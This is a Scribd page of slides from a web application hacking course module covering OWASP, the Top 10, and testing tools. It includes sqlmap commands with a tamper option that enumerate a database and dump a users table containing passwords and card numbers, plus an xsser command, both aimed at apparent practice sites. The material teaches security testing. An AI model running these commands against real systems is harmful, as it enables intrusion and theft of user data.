Scribd
Upload
9 views16 pages

Web Application Hacking

Uploaded by

orebakintoluwani
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
9 views16 pages

Web Application Hacking

Uploaded by

orebakintoluwani
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 16

MODULE 15: WEB APPLICATION HACKING

MODULE OBJECTIVE
The course will focus on common security threats to web applications and what
are countermeasures strategies available. The primary aim of the course is to
educate developers, designers, architects and organizations about the
consequences of the most common web application security vulnerabilities and
methodology to protect against such vulnerabilities. At the end of this course you
will learn:

- How to identify, exploit and mitigate web application vulnerabilities.


2
TOPICS

Topics:
Introduction To OWASP.
OWASP Top 10.

Tools For Web Application Testing.


3
INTRODUCTION TO OWASP
INTRODUCTION TO OWASP

The Open Web Application Security Project (OWASP) is a nonprofit


foundation that works to improve the security of software.

5
OWASP TOP 10
OWASP TOP 10

7
WHAT CHANGED FROM 2017 TO 2021?

8
TOOLS FOR WEB APPLICATION HACKING
TOOLS FOR WEB APPLICATION TESTING

- sqlmap (SQL Injection)


- xsser & beef (cross-site scripting)
- Burpsuite
- Owasp-Zap

10
SQL INJECTION WITH SQLMAP
SQL INJECTION

SQL Injection With sqlmap:


sqlmap -r /home/kali/Desktop/log --proxy=http://127.0.0.1:8080 --tamper=space2comment -p test --
dbs

sqlmap -r /home/kali/Desktop/log --proxy=http://127.0.0.1:8080 --tamper=space2comment -p test -D
acuart --tables

sqlmap -r /home/kali/Desktop/log --proxy=http://127.0.0.1:8080 --tamper=space2comment -p test -D
acuart -T users –columns

sqlmap -r /home/kali/Desktop/log --proxy=http://127.0.0.1:8080 --tamper=space2comment -p test -D
acuart -T users -C name,pass,email,phone,address,cc,cart --dump

12
CROSS SITE SCRIPTING (XSS) WITH XSSER
CROSS SITE SCRIPTING (XSS)

Detecting Cross Site Scripting Vulnerability With xsser:

Installing xsser if not installed:



sudo apt install xsser

Usage:

sudo xsser -u ’ http://test.vulnweb.com’ -g ‘/listproducts.php?cat=XSS’

14
SUMMARY
SUMMARY

This module aims at identifying flaw or weakness in a web-based application.


Largely due to not validating or sanitizing form inputs, misconfigured web

servers, and application design flaws, they can be exploited to compromise the
application’s security. These vulnerabilities are not the same as other common
types of vulnerabilities, such as network or asset. They arise because web
applications need to interact with multiple users across multiple networks, and
that level of accessibility is easily taken advantage of by hackers.

16

You might also like